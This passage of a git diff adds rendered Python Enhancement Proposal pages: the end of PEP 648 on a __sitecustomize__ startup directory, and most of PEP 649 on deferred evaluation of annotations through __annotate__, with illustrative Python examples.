In short, whilst this allows a malicious user to drop a file that will +be executed at startup, it’s an improvement compared to the existing pth +files.

+
+
+
+

How to teach this

+

This can be documented and taught as simply as saying that the interpreter +will try to look for the __sitecustomize__ directory at startup in its +site paths and if it finds any files with a .py extension, it will +execute them one by one.

+

For system administrators and tools that package the interpreter, we can now +recommend placing files in __sitecustomize__ as they used to place +sitecustomize.py. They can be more confident that their content won’t be +overridden by the next person, as they can provide specific files to +handle the logic they want to customize.

+

Library developers should be able to specify a new argument on tools like +setuptools that will inject those new files. Something like +sitecustomize_files=["scripts/betterexceptions.py"], which allows them to +add those. Should the build backend not support that, they can manually +install them as they used to do with pth files. We will recommend that they +include the name of the package as part of the file’s name.

+
+
+

Backward compatibility

+

This PEP adds a deprecation warning on sitecustomize.py, +usercustomize.py and pth code execution in 3.11, 3.12 and 3.13. With +plans on removing those features by 3.14. The migration from those solutions +to __sitecustomize__ should ideally be just moving the logic into a +different file.

+

Whilst the existing sitecustomize.py mechanism was created targeting +System Administrators that placed it in a site path, the file could be +actually placed anywhere in the path at the time that the interpreter was +starting up. The new mechanism does not allow for users to place +__sitecustomize__ directories anywhere in the path, but only in site +paths. System administrators can recover a similar behavior to +sitecustomize.py by adding a custom file in __sitecustomize__ which +just imports sitecustomize as a migration path.

+
+
+

Reference Implementation

+

An initial implementation that passes the CPython test suite is available for +evaluation [6].

+

This implementation is just for the reviewer to play with and check potential +issues that this PEP could generate.

+
+
+

Rejected Ideas

+
+

Do nothing

+

Whilst the current status “works” it presents the issues listed in the +motivation. After analyzing the impact of this change, we believe it is worth +it, given the enhanced experience it brings.

+
+
+

Formalize using pth files

+

Another option would be to just glorify and document the usage of pth files +to inject code at startup, but that is a suboptimal experience for users +as listed in the motivation.

+
+
+

Making __sitecustomize__ a namespace package

+

We considered making the directory a namespace package and just import all +the modules within it, which allowed searching across all paths in +sys.path at initialization time and provided a way to declare +dependencies between files by importing each other. This was rejected for +multiple reasons:

+
    +
  1. This was unnecessarily broadening the list of paths where arbitrary files +are executed.
  2. +
  3. The logic brought additional complexity, like what to do if a package were +to install an __init__.py file in one of the locations.
  4. +
  5. It’s cheaper to search for __sitecustomize__ as we are looking for +pth files already in the site paths compared to performing an actual +import of a namespace package.
  6. +
+
+
+

Support for shutdown customization

+

init.d users might be tempted to implement this feature in a way that users +could also add code at shutdown, but extra support for that is not needed, as +Python users can already do that via atexit.

+
+
+

Using entry_points

+

We considered extending the use of entry points to allow specifying files +that should be executed at startup but we discarded that solution due to two +main reasons. The first one being impact on startup time. This approach will +require scanning all packages distribution information to just execute a +handful of files. This has an impact on performance even if the user is not +using the feature, and the impact grows linearly with the number of packages +installed in the environment. The second reason was that the proposed +implementation in this PEP offers a single solution for startup customization +for packages and system administrators. Additionally, if the main objective of +entry points is to make it easy for libraries to install files at startup, +that support can still be added by having build backends install the files +within the __sitecustomize__ directory.

+
+
+ +
+

Acknowledgements

+

Thanks Pablo Galindo for contributing to this PEP and offering his PC to run +the benchmark.

+
+
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0648.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0649/index.html b/pep-0649/index.html new file mode 100644 index 00000000000..72010482f5d --- /dev/null +++ b/pep-0649/index.html @@ -0,0 +1,1512 @@ + PEP 649 – Deferred Evaluation Of Annotations Using Descriptors | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 649 – Deferred Evaluation Of Annotations Using Descriptors

+
+
Author:
+
Larry Hastings <larry at hastings.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
11-Jan-2021
+
Python-Version:
+
3.14
+
Post-History:
+
11-Jan-2021, +12-Apr-2021, +18-Apr-2021, +09-Aug-2021, +20-Oct-2021, +20-Oct-2021, +17-Nov-2021, +15-Mar-2022, +23-Nov-2022, +07-Feb-2023, +11-Apr-2023
+
Replaces:
+
563
+
Resolution:
+
08-May-2023
+
+
+
+
+
+

Abstract

+

Annotations are a Python technology that allows expressing +type information and other metadata about Python functions, +classes, and modules. But Python’s original semantics +for annotations required them to be eagerly evaluated, +at the time the annotated object was bound. This caused +chronic problems for static type analysis users using +“type hints”, due to forward-reference and circular-reference +problems.

+

Python solved this by accepting PEP 563, incorporating +a new approach called “stringized annotations” in which +annotations were automatically converted into strings by +Python. This solved the forward-reference and circular-reference +problems, and also fostered intriguing new uses for annotation +metadata. But stringized annotations in turn caused chronic +problems for runtime users of annotations.

+

This PEP proposes a new and comprehensive third approach +for representing and computing annotations. It adds a new +internal mechanism for lazily computing annotations on demand, +via a new object method called __annotate__. +This approach, when combined with a novel technique for +coercing annotation values into alternative formats, solves +all the above problems, supports all existing use cases, +and should foster future innovations in annotations.

+
+
+

Overview

+

This PEP adds a new dunder attribute to the objects that +support annotations–functions, classes, and modules. +The new attribute is called __annotate__, and is +a reference to a function which computes and returns +that object’s annotations dict.

+

At compile time, if the definition of an object includes +annotations, the Python compiler will write the expressions +computing the annotations into its own function. When run, +the function will return the annotations dict. The Python +compiler then stores a reference to this function in +__annotate__ on the object.

+

Furthermore, __annotations__ is redefined to be a +“data descriptor” which calls this annotation function once +and caches the result.

+

This mechanism delays the evaluation of annotations expressions +until the annotations are examined, which solves many circular +reference problems.

+

This PEP also defines new functionality for two functions +in the Python standard library: +inspect.get_annotations and typing.get_type_hints. +The functionality is accessed via a new keyword-only parameter, +format. format allows the user to request +the annotations from these functions +in a specific format. +Format identifiers are always predefined integer values. +The formats defined by this PEP are listed below; a usage sketch follows the list.

+
    +
  • inspect.VALUE = 1

    The default value. +The function will return the conventional Python +values for the annotations. This format is identical +to the return value for these functions under Python 3.11.

    +
  • +
  • inspect.FORWARDREF = 2

    The function will attempt to return the conventional +Python values for the annotations. However, if it +encounters an undefined name, or a free variable that +has not yet been associated with a value, it dynamically +creates a proxy object (a ForwardRef) that substitutes +for that value in the expression, then continues evaluation. +The resulting dict may contain a mixture of proxies and +real values. If all real values are defined at the time +the function is called, inspect.FORWARDREF and +inspect.VALUE produce identical results.

    +
  • +
  • inspect.SOURCE = 3

    The function will produce an annotation dictionary +where the values have been replaced by strings containing +the original source code for the annotation expressions. +These strings may only be approximate, as they may be +reverse-engineered from another format, rather than +preserving the original source code, but the differences +will be minor.

    +
  • +
+
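
For illustration, here’s how the three formats might behave for a function whose annotation references a never-defined name. This is only a sketch assuming the semantics proposed below; the results shown in the comments are illustrative:

+
import inspect
+
+def f(x: Undefined) -> int:    # "Undefined" is deliberately never defined
+    ...
+
+inspect.get_annotations(f, format=inspect.VALUE)
+# raises NameError: name 'Undefined' is not defined
+inspect.get_annotations(f, format=inspect.FORWARDREF)
+# {'x': ForwardRef('Undefined'), 'return': <class 'int'>}
+inspect.get_annotations(f, format=inspect.SOURCE)
+# {'x': 'Undefined', 'return': 'int'}
+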

If accepted, this PEP would supersede PEP 563, +and PEP 563’s behavior would be deprecated and +eventually removed.

+
+

Comparison Of Annotation Semantics

+
+

Note

+

The code presented in this section is simplified +for clarity, and is intentionally inaccurate in some +critical aspects. This example is intended merely to +communicate the high-level concepts involved without +getting lost in the details. But readers should note +that the actual implementation is quite different in +several important ways. See the Implementation +section later in this PEP for a far more accurate +description of what this PEP proposes from a technical +level.

+
+

Consider this example code:

+
def foo(x: int = 3, y: MyType = None) -> float:
+    ...
+class MyType:
+    ...
+foo_y_annotation = foo.__annotations__['y']
+
+
+

As we see here, annotations are available at runtime through an +__annotations__ attribute on functions, classes, and modules. +When annotations are specified on one of these objects, +__annotations__ is a dictionary mapping the names of the +fields to the value specified as that field’s annotation.

+

The default behavior in Python is to evaluate the expressions +for the annotations, and build the annotations dict, at the time +the function, class, or module is bound. At runtime the above +code actually works something like this:

+
annotations = {'x': int, 'y': MyType, 'return': float}
+def foo(x = 3, y = None):
+    ...
+foo.__annotations__ = annotations
+class MyType:
+    ...
+foo_y_annotation = foo.__annotations__['y']
+
+
+

The crucial detail here is that the values int, MyType, +and float are looked up at the time the function object is +bound, and these values are stored in the annotations dict. +But this code doesn’t run—it throws a NameError on the first +line, because MyType hasn’t been defined yet.

+

PEP 563’s solution is to decompile the expressions back +into strings during compilation and store those strings as the +values in the annotations dict. The equivalent runtime code +would look something like this:

+
annotations = {'x': 'int', 'y': 'MyType', 'return': 'float'}
+def foo(x = 3, y = None):
+    ...
+foo.__annotations__ = annotations
+class MyType:
+    ...
+foo_y_annotation = foo.__annotations__['y']
+
+
+

This code now runs successfully. However, foo_y_annotation +is no longer a reference to MyType, it is the string +'MyType'. To turn the string into the real value MyType, +the user would need to evaluate the string using eval, +inspect.get_annotations, or typing.get_type_hints.

+

This PEP proposes a third approach, delaying the evaluation of +the annotations by computing them in their own function. If +this PEP was active, the generated code would work something +like this:

+
class function:
+    # __annotations__ on a function object is already a
+    # "data descriptor" in Python, we're just changing
+    # what it does
+    @property
+    def __annotations__(self):
+        return self.__annotate__()
+
+# ...
+
+def annotate_foo():
+    return {'x': int, 'y': MyType, 'return': float}
+def foo(x = 3, y = None):
+    ...
+foo.__annotate__ = annotate_foo
+class MyType:
+    ...
+foo_y_annotation = foo.__annotations__['y']
+
+
+

The important change is that the code constructing the +annotations dict now lives in a function—here, called +annotate_foo(). But this function isn’t called +until we ask for the value of foo.__annotations__, +and we don’t do that until after the definition of MyType. +So this code also runs successfully, and foo_y_annotation now +has the correct value–the class MyType–even though +MyType wasn’t defined until after the annotation was +defined.

+
+
+

Mistaken Rejection Of This Approach In November 2017

+

During the early days of discussion around PEP 563, +in a November 2017 thread in comp.lang.python-dev, +the idea of using code to delay the evaluation of +annotations was briefly discussed. At the time the +technique was termed an “implicit lambda expression”.

+

Guido van Rossum—Python’s BDFL at the time—replied, +asserting that these “implicit lambda expressions” wouldn’t +work, because they’d only be able to resolve symbols at +module-level scope:

+
+
IMO the inability of referencing class-level definitions +from annotations on methods pretty much kills this idea.
+

https://mail.python.org/pipermail/python-dev/2017-November/150109.html

+

This led to a short discussion about extending lambda-ized +annotations for methods to be able to refer to class-level +definitions, by maintaining a reference to the class-level +scope. This idea, too, was quickly rejected.

+

PEP 563 summarizes the above discussion.

+

The approach taken by this PEP doesn’t suffer from these +restrictions. Annotations can access module-level definitions, +class-level definitions, and even local and free variables.

+
+
+
+

Motivation

+
+

A History Of Annotations

+

Python 3.0 shipped with a new syntax feature, “annotations”, +defined in PEP 3107. +This allowed specifying a Python value that would be +associated with a parameter of a Python function, or +with the value that function returns. +Said another way, annotations gave Python users an interface +to provide rich metadata about a function parameter or return +value, for example type information. +All the annotations for a function were stored together in +a new attribute __annotations__, in an “annotation dict” +that mapped parameter names (or, in the case of the return +annotation, using the name 'return') to their Python value.

+
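
A minimal example of the annotation dict as introduced by PEP 3107 (the expected output is shown in the comment):

+
def scale(value: float, factor: float = 2.0) -> float:
+    return value * factor
+
+print(scale.__annotations__)
+# {'value': <class 'float'>, 'factor': <class 'float'>, 'return': <class 'float'>}
+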

In an effort to foster experimentation, Python +intentionally didn’t define what form this metadata should take, +or what values should be used. User code began experimenting with +this new facility almost immediately. But popular libraries that +make use of this functionality were slow to emerge.

+

After years of little progress, the BDFL chose a particular +approach for expressing static type information, called +type hints, as defined in PEP 484. Python 3.5 shipped +with a new typing module which quickly became very popular.

+

Python 3.6 added syntax to annotate local variables, +class attributes, and module attributes, using the approach +proposed in PEP 526. Static type analysis continued to +grow in popularity.

+

However, static type analysis users were increasingly frustrated +by an inconvenient problem: forward references. In classic +Python, if a class C depends on a later-defined class D, +it’s normally not a problem, because user code will usually +wait until both are defined before trying to use either. +But annotations added a new complication, because they were +computed at the time the annotated object (function, class, +or module) was bound. If methods on class C are annotated with +type D, and these annotation expressions are computed at the +time that the method is bound, D may not be defined yet. +And if methods in D are also annotated with type C, you now +have an unresolvable circular reference problem.

+
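
A sketch of the circular-reference problem, using two hypothetical classes; under stock semantics this fails no matter which class is defined first:

+
class C:
+    def spawn(self) -> D:    # NameError: D isn't defined yet
+        ...
+
+class D:
+    def parent(self) -> C:   # reordering merely moves the problem here
+        ...
+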

Initially, static type users worked around this problem +by defining their problematic annotations as strings. +This worked because a string containing the type hint was +just as usable for the static type analysis tool. +And users of static type analysis tools rarely examine the +annotations at runtime, so this representation wasn’t +itself an inconvenience. But manually stringizing type +hints was clumsy and error-prone. Also, code bases were +adding more and more annotations, which consumed more and +more CPU time to create and bind.

+
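
The manual workaround looked like this; the strings satisfy the static type checker, but they are no longer real references to the classes:

+
class C:
+    def spawn(self) -> "D":    # manually stringized forward reference
+        ...
+
+class D:
+    def parent(self) -> "C":
+        ...
+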

To solve these problems, the BDFL accepted PEP 563, which +added a new feature to Python 3.7: “stringized annotations”. +It was activated with a future import:

+
from __future__ import annotations
+
+
+

Normally, annotation expressions were evaluated at the time +the object was bound, with their values being stored in the +annotations dict. When stringized annotations were active, +these semantics changed: instead, at compile time, the compiler +converted all annotations in that module into string +representations of their source code–thus, automatically +turning the user’s annotations into strings, obviating the +need to manually stringize them as before. PEP 563 +suggested users could evaluate this string with eval +if the actual value was needed at runtime.

+

(From here on out, this PEP will refer to the classic +semantics of PEP 3107 and PEP 526, where the +values of annotation expressions are computed at the time +the object is bound, as “stock” semantics, to differentiate +them from the new PEP 563 “stringized” annotation semantics.)

+
+
+

The Current State Of Annotation Use Cases

+

Although there are many specific use cases for annotations, +annotation users in the discussion around this PEP tended +to fall into one of these four categories.

+
+

Static typing users

+

Static typing users use annotations to add type information +to their code. But they largely don’t examine the annotations +at runtime. Instead, they use static type analysis tools +(mypy, pytype) to examine their source tree and determine +whether or not their code is using types consistently. +This is almost certainly the most popular use case for +annotations today.

+

Many of the annotations use type hints, à la PEP 484 +(and many subsequent PEPs). Type hints are passive objects, +mere representations of type information; they don’t do any actual work. +Type hints are often parameterized with other types or other type hints. +Since they’re agnostic about what these actual values are, type hints +work fine with ForwardRef proxy objects. +Users of static type hints discovered that extensive type hinting under +stock semantics often created large-scale circular reference and circular +import problems that could be difficult to solve. PEP 563 was designed +specifically to solve this problem, and the solution worked great for +these users. The difficulty of rendering stringized annotations into +real values largely didn’t inconvenience these users because of how +infrequently they examine annotations at runtime.

+

Static typing users often combine PEP 563 with the +if typing.TYPE_CHECKING idiom to prevent their type hints from being +loaded at runtime. This means they often aren’t able to evaluate their +stringized annotations and produce real values at runtime. On the rare +occasion that they do examine annotations at runtime, they often forgo +eval, instead using lexical analysis directly on the stringized +annotations.

+
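
The idiom looks roughly like this (the module and type names are hypothetical); the annotation is quoted so the definition works whether or not PEP 563 is active:

+
from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    # Seen by static type checkers, never imported at runtime, so the
+    # stringized annotation below can't be evaluated at runtime.
+    from big_expensive_module import BigType
+
+def process(data: "BigType") -> None:
+    ...
+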

Under this PEP, static typing users will probably prefer FORWARDREF +or SOURCE format.

+
+
+

Runtime annotation users

+

Runtime annotation users use annotations as a means of expressing rich +metadata about their functions and classes, which they use as input to +runtime behavior. Specific use cases include runtime type verification +(Pydantic) and glue logic to expose Python APIs in another domain +(FastAPI, Typer). The annotations may or may not be type hints.

+

As runtime annotation users examine annotations at runtime, they were +traditionally better served with stock semantics. This use case is +largely incompatible with PEP 563, particularly with the +if typing.TYPE_CHECKING idiom.

+

Under this PEP, runtime annotation users will most likely prefer VALUE +format, though some (e.g. if they evaluate annotations eagerly in a decorator +and want to support forward references) may also use FORWARDREF format.

+
+
+

Wrappers

+

Wrappers are functions or classes that wrap user functions or +classes and add functionality. Examples of this would be +dataclass(), functools.partial(), +attrs, and wrapt.

+

Wrappers are a distinct subcategory of runtime annotation users. +Although they do use annotations at runtime, they may or may not +actually examine the annotations of the objects they wrap–it depends +on the functionality the wrapper provides. As a rule they should +propagate the annotations of the wrapped object to the wrapper +they create, although it’s possible they may modify those annotations.

+

Wrappers were generally designed to work well under stock semantics. +Whether or not they work well under PEP 563 semantics depends on the +degree to which they examine the wrapped object’s annotations. +Often wrappers don’t care about the value per se, only needing +specific information about the annotations. Even so, PEP 563 +and the if typing.TYPE_CHECKING idiom can make it difficult +for wrappers to reliably determine the information they need at +runtime. This is an ongoing, chronic problem. +Under this PEP, wrappers will probably prefer FORWARDREF format +for their internal logic. But the wrapped objects need to support +all formats for their users.

+
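
As a concrete illustration of propagating annotations (not part of this PEP’s specification), functools.wraps already copies __annotations__, along with __name__, __doc__, and other attributes, from the wrapped function onto the wrapper:

+
import functools
+
+def logged(fn):
+    @functools.wraps(fn)    # copies fn.__annotations__ onto wrapper
+    def wrapper(*args, **kwargs):
+        print(f"calling {fn.__name__}")
+        return fn(*args, **kwargs)
+    return wrapper
+
+@logged
+def greet(name: str) -> str:
+    return f"hello, {name}"
+
+print(greet.__annotations__)    # {'name': <class 'str'>, 'return': <class 'str'>}
+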
+
+

Documentation

+

PEP 563 stringized annotations were a boon for tools that +mechanically construct documentation.

+

Stringized type hints make for excellent documentation; type hints +as expressed in source code are often succinct and readable. However, +at runtime these same type hints can produce values whose repr +is a sprawling, nested, unreadable mess. Thus documentation users were +well-served by PEP 563 but poorly served with stock semantics.

+

Under this PEP, documentation users are expected to use SOURCE format.

+
+
+
+

Motivation For This PEP

+

Python’s original semantics for annotations made its use for +static type analysis painful due to forward reference problems. +PEP 563 solved the forward reference problem, and many +static type analysis users became happy early adopters of it. +But its unconventional solution created new problems for two +of the above cited use cases: runtime annotation users, +and wrappers.

+

First, stringized annotations didn’t permit referencing local or +free variables, which meant many useful, reasonable approaches +to creating annotations were no longer viable. This was +particularly inconvenient for decorators that wrap existing +functions and classes, as these decorators often use closures.

+

Second, in order for eval to correctly look up globals in a +stringized annotation, you must first obtain a reference +to the correct module. +But class objects don’t retain a reference to their globals. +PEP 563 suggests looking up a class’s module by name in +sys.modules—a surprising requirement for a language-level +feature.

+

Additionally, complex but legitimate constructions can make it +difficult to determine the correct globals and locals dicts to +give to eval to properly evaluate a stringized annotation. +Even worse, in some situations it may simply be infeasible.

+

For example, some libraries (e.g. typing.TypedDict, dataclasses) +wrap a user class, then merge all the annotations from all that +class’s base classes together into one cumulative annotations dict. +If those annotations were stringized, calling eval on them later +may not work properly, because the globals dictionary used for the +eval will be the module where the user class was defined, +which may not be the same module where the annotation was +defined. However, if the annotations were stringized because +of forward-reference problems, calling eval on them early +may not work either, due to the forward reference not being +resolvable yet. This has proved to be difficult to reconcile; +of the three bug reports linked to below, only one has been +marked as fixed.

+ +

Even with proper globals and locals, eval can be unreliable +on stringized annotations. +eval can only succeed if all the symbols referenced in +an annotation are defined. If a stringized annotation refers +to a mixture of defined and undefined symbols, a simple eval +of that string will fail. This is a problem for libraries +that need to examine the annotation, because they can’t reliably +convert these stringized annotations into real values.

+
    +
  • Some libraries (e.g. dataclasses) solved this by foregoing real +values and performing lexical analysis of the stringized annotation, +which requires a lot of work to get right.
  • +
  • Other libraries still suffer with this problem, +which can produce surprising runtime behavior. +https://github.com/python/cpython/issues/97727
  • +
+

Also, eval() is slow, and it isn’t always available; it’s +sometimes removed for space reasons on certain platforms. +eval() on MicroPython doesn’t support the locals +argument, which makes converting stringized annotations +into real values at runtime even harder.

+

Finally, PEP 563 requires Python implementations to +stringize their annotations. This is surprising behavior—unprecedented +for a language-level feature, with a complicated implementation, +that must be updated whenever a new operator is added to the +language.

+

These problems motivated the research into finding a new +approach to solve the problems facing annotations users, +resulting in this PEP.

+
+
+
+

Implementation

+
+

Observed semantics for annotations expressions

+

For any object o that supports annotations, +provided that all names evaluated in the annotations expressions +are bound before o is defined and never subsequently rebound, +o.__annotations__ will produce an identical annotations dict both +when “stock” semantics are active and when this PEP is active. +In particular, name resolution will be performed identically in +both scenarios.

+

When this PEP is active, the value of o.__annotations__ +won’t be calculated until the first time o.__annotations__ +itself is evaluated. All evaluation of the annotation expressions +is delayed until this moment, which also means that

+
    +
  • names referenced in the annotations expressions will use their +current value at this moment, and
  • +
  • if evaluating the annotations expressions raises an exception, +that exception will be raised at this moment.
  • +
+

Once o.__annotations__ is successfully calculated for the +first time, this value is cached and will be returned by future +requests for o.__annotations__.

+
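
A short sketch of this observable behavior, assuming this PEP’s semantics:

+
def f(x: int):
+    ...
+
+a = f.__annotations__    # first access: the __annotate__ function runs now
+b = f.__annotations__    # second access: served from the cache
+assert a is b            # the very same dict object
+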
+
+

__annotate__ and __annotations__

+

Python supports annotations on three different types: +functions, classes, and modules. This PEP modifies +the semantics on all three of these types in a similar +way.

+

First, this PEP adds a new “dunder” attribute, __annotate__. +__annotate__ must be a “data descriptor”, +implementing all three actions: get, set, and delete. +The __annotate__ attribute is always defined, +and may only be set to either None or to a callable. +(__annotate__ cannot be deleted.) If an object +has no annotations, __annotate__ should be +initialized to None, rather than to a function +that returns an empty dict.

+

The __annotate__ data descriptor must have dedicated +storage inside the object to store the reference to its value. +The location of this storage at runtime is an implementation +detail. Even if it’s visible to Python code, it should still +be considered an internal implementation detail, and Python +code should prefer to interact with it only via the +__annotate__ attribute.

+

The callable stored in __annotate__ must accept a +single required positional argument called format, +which will always be an int (or a subclass of int). +It must either return a dict (or subclass of dict) or +raise NotImplementedError().

+

Here’s a formal definition of __annotate__, as it will +appear in the “Magic methods” section of the Python +Language Reference:

+
+
__annotate__(format: int) -> dict

Returns a new dictionary object mapping attribute/parameter +names to their annotation values.

+

Takes a format parameter specifying the format in which +annotations values should be provided. Must be one of the +following:

+

inspect.VALUE (equivalent to the int constant 1)

+
+
Values are the result of evaluating the annotation expressions.
+

inspect.FORWARDREF (equivalent to the int constant 2)

+
+
Values are real annotation values (as per inspect.VALUE format) +for defined values, and ForwardRef proxies for undefined values. +Real objects may be exposed to, or contain references to, +ForwardRef proxy objects.
+

inspect.SOURCE (equivalent to the int constant 3)

+
+
Values are the text string of the annotation as it +appears in the source code. May only be approximate; +whitespace may be normalized, and constant values may +be optimized. It’s possible the exact values of these +strings could change in future versions of Python.
+

If an __annotate__ function doesn’t support the requested +format, it must raise NotImplementedError(). +__annotate__ functions must always support format 1 +(inspect.VALUE); they must not raise NotImplementedError() when called with +format=1.

+

When called with format=1, an __annotate__ function +may raise NameError; it must not raise NameError when called +requesting any other format.

+

If an object doesn’t have any annotations, __annotate__ should +preferably be set to None (it can’t be deleted), rather than set to a +function that returns an empty dict.

+
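
A minimal hand-written annotate function obeying this contract might look as follows; my_annotate is a hypothetical name, and only VALUE format is supported:

+
def my_annotate(format):
+    if format != 1:    # 1 == inspect.VALUE, the only mandatory format
+        raise NotImplementedError()
+    return {'x': int, 'return': str}
+
+def f(x):
+    ...
+
+f.__annotate__ = my_annotate
+print(f.__annotations__)    # {'x': <class 'int'>, 'return': <class 'str'>}
+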
+

When the Python compiler compiles an object with +annotations, it simultaneously compiles the appropriate +annotate function. This function, called with +the single positional argument inspect.VALUE, +computes and returns the annotations dict as defined +on that object. The Python compiler and runtime work +in concert to ensure that the function is bound to +the appropriate namespaces:

+
    +
  • For functions and classes, the globals dictionary will +be the module where the object was defined. If the object +is itself a module, its globals dictionary will be its +own dict.
  • +
  • For methods on classes, and for classes, the locals dictionary +will be the class dictionary.
  • +
  • If the annotations refer to free variables, the closure will +be the appropriate closure tuple containing cells for free variables.
  • +
+

Second, this PEP requires that the existing +__annotations__ must be a “data descriptor”, +implementing all three actions: get, set, and delete. +__annotations__ must also have its own internal +storage it uses to cache a reference to the annotations dict:

+
    +
  • Class and module objects must +cache the annotations dict in their __dict__, using the key +__annotations__. This is required for backwards +compatibility reasons.
  • +
  • For function objects, storage for the annotations dict +cache is an implementation detail. It’s preferably internal +to the function object and not visible in Python.
  • +
+

This PEP defines semantics on how __annotations__ and +__annotate__ interact, for all three types that implement them. +In the following examples, fn represents a function, cls +represents a class, mod represents a module, and o represents +an object of any of these three types:

+
    +
  • When o.__annotations__ is evaluated, and the internal storage +for o.__annotations__ is unset, and o.__annotate__ is set +to a callable, the getter for o.__annotations__ calls +o.__annotate__(1), then caches the result in its internal +storage and returns the result.
      +
    • To explicitly clarify one question that has come up multiple times: +this o.__annotations__ cache is the only caching mechanism +defined in this PEP. There are no other caching mechanisms defined +in this PEP. The __annotate__ functions generated by the Python +compiler explicitly don’t cache any of the values they compute.
    • +
    +
  • +
  • Setting o.__annotate__ to a callable invalidates the +cached annotations dict.
  • +
  • Setting o.__annotate__ to None has no effect on +the cached annotations dict.
  • +
  • Deleting o.__annotate__ raises TypeError. +__annotate__ must always be set; this prevents unannotated +subclasses from inheriting the __annotate__ method of one +of their base classes.
  • +
  • Setting o.__annotations__ to a legal value +automatically sets o.__annotate__ to None.
      +
    • Setting cls.__annotations__ or mod.__annotations__ +to None otherwise works like any other attribute; the +attribute is set to None.
    • +
    • Setting fn.__annotations__ to None invalidates +the cached annotations dict. If fn.__annotations__ +doesn’t have a cached annotations value, and fn.__annotate__ +is None, the fn.__annotations__ data descriptor +creates, caches, and returns a new empty dict. (This is for +backwards compatibility with PEP 3107 semantics.)
    • +
    +
  • +
+
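
A sketch illustrating several of these interactions together, assuming this PEP’s semantics:

+
def f(x: int):
+    ...
+
+assert callable(f.__annotate__)           # generated by the compiler
+assert f.__annotations__ == {'x': int}    # computed via __annotate__(1), then cached
+
+f.__annotations__ = {'x': str}            # explicitly setting __annotations__...
+assert f.__annotate__ is None             # ...automatically sets __annotate__ to None
+
+# del f.__annotate__                      # would raise TypeError; it can't be deleted
+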
+
+

Changes to allowable annotations syntax

+

__annotate__ now delays the evaluation of annotations until +__annotations__ is referenced in the future. This also means +annotations are evaluated in a new function, rather than in the +original context where the object they were defined on was bound. +There are four operators with significant runtime side-effects +that were permitted in stock semantics, but are disallowed when +from __future__ import annotations is active, and will have +to be disallowed when this PEP is active:

+
    +
  • :=
  • +
  • yield
  • +
  • yield from
  • +
  • await
  • +
+
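
For example, under this PEP the following definition would be rejected at compile time (a sketch):

+
def f(x: (y := 3)) -> None:    # SyntaxError: ":=" is disallowed in annotations
+    ...
+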
+
+

Changes to inspect.get_annotations and typing.get_type_hints

+

(This PEP makes frequent reference to these two functions. In the future +it will refer to them collectively as “the helper functions”, as they help +user code work with annotations.)

+

These two functions extract and return the annotations from an object. +inspect.get_annotations returns the annotations unchanged; +for the convenience of static typing users, typing.get_type_hints +makes some modifications to the annotations before it returns them.

+

This PEP adds a new keyword-only parameter to these two functions, +format. format specifies what format the values in the +annotations dict should be returned in. +The format parameter on these two functions accepts the same values +as the format parameter on the __annotate__ magic method +defined above; however, these format parameters also have a default +value of inspect.VALUE.

+

When either __annotations__ or __annotate__ is updated on an +object, the other of those two attributes is now out-of-date and should also +either be updated or deleted (set to None, in the case of __annotate__ +which cannot be deleted). In general, the semantics established in the previous +section ensure that this happens automatically. However, there’s one case which +for all practical purposes can’t be handled automatically: when the dict cached +by o.__annotations__ is itself modified, or when mutable values inside that +dict are modified.

+

Since this can’t be handled in code, it must be handled in +documentation. This PEP proposes amending the documentation +for inspect.get_annotations (and similarly for +typing.get_type_hints) as follows:

+
+
If you directly modify the __annotations__ dict on an object, +by default these changes may not be reflected in the dictionary +returned by inspect.get_annotations when requesting either +SOURCE or FORWARDREF format on that object. Rather than +modifying the __annotations__ dict directly, consider replacing +that object’s __annotate__ method with a function computing +the annotations dict with your desired values. Failing that, it’s +best to overwrite the object’s __annotate__ method with None +to prevent inspect.get_annotations from generating stale results +for SOURCE and FORWARDREF formats.
+
+
+

The stringizer and the fake globals environment

+

As originally proposed, this PEP supported many runtime +annotation user use cases, and many static type user use cases. +But this was insufficient–this PEP could not be accepted +until it satisfied all extant use cases. This became +a longtime blocker of this PEP until Carl Meyer proposed +the “stringizer” and the “fake globals” environment as +described below. These techniques allow this PEP to support +both the FORWARDREF and SOURCE formats, ably +satisfying all remaining use cases.

+

In a nutshell, this technique involves running a +Python-compiler-generated __annotate__ function in +an exotic runtime environment. Its normal globals +dict is replaced with what’s called a “fake globals” dict. +A “fake globals” dict is a dict with one important difference: +every time you “get” a key from it that isn’t mapped, +it creates, caches, and returns a new value for that key +(as per the __missing__ callback for a dictionary). +That value is an instance of a novel type referred to +as a “stringizer”.

+

A “stringizer” is a Python class with highly unusual behavior. +Every stringizer is initialized with its “value”, initially +the name of the missing key in the “fake globals” dict. The +stringizer then implements every Python “dunder” method used to +implement operators, and the value returned by that method +is a new stringizer whose value is a text representation +of that operation.

+

When these stringizers are used in expressions, the result +of the expression is a new stringizer whose name textually +represents that expression. For example, let’s say +you have a variable f, which is a reference to a +stringizer initialized with the value 'f'. Here are +some examples of operations you could perform on f and +the values they would return:

+
>>> f
+Stringizer('f')
+>>> f + 3
+Stringizer('f + 3')
+>>> f["key"]
+Stringizer('f["key"]')
+
+
+
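
Here’s a deliberately tiny sketch of the two pieces working together. It handles only the two operators from the example above (the real implementation must cover every relevant dunder method), and the attribute name __stringizer_value__ is hypothetical:

+
class Stringizer:
+    def __init__(self, value):
+        self.__stringizer_value__ = value
+    def __repr__(self):
+        return f"Stringizer({self.__stringizer_value__!r})"
+    def __add__(self, other):
+        return Stringizer(f"{self.__stringizer_value__} + {other!r}")
+    def __getitem__(self, key):
+        return Stringizer(f"{self.__stringizer_value__}[{key!r}]")
+
+class FakeGlobals(dict):
+    def __missing__(self, key):
+        # every unmapped name lazily becomes a stringizer for that name
+        value = self[key] = Stringizer(key)
+        return value
+
+fake = FakeGlobals()
+print(fake['f'] + 3)       # Stringizer('f + 3')
+print(fake['f']['key'])    # Stringizer("f['key']")
+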

Bringing it all together: if we run a Python-generated +__annotate__ function, but we replace its globals +with a “fake globals” dict, all undefined symbols it +references will be replaced with stringizer proxy objects +representing those symbols, and any operations performed +on those proxies will in turn result in proxies +representing that expression. This allows __annotate__ +to complete, and to return an annotations dict, with +stringizer instances standing in for names and entire +expressions that could not have otherwise been evaluated.

+

